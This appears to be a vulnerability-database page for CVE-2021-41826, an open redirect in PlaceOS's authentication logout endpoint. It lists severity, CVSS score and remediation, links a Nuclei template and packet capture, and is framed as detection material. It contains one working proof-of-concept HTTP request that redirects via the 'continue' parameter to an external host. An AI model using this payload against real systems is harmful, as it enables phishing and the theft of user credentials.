🔙 목록으로 돌아가기

CVE-2021-41826: PlaceOS 1.2109.1 - Open Redirection

TitlePlaceOS 1.2109.1 - Open Redirection
Authorgeeknik
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
RemediationApply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability.
CVSS Score6.1
EPSS Score0.23963
CVE IDCVE-2021-41826
CWE IDCWE-601
Tags cve2021 cve redirect edb packetstorm placeos place vuln

🔍 Vulnerability Description

PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.

🌐 HTTP Request

GET /auth/logout?continue=//interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41826.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-41826.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A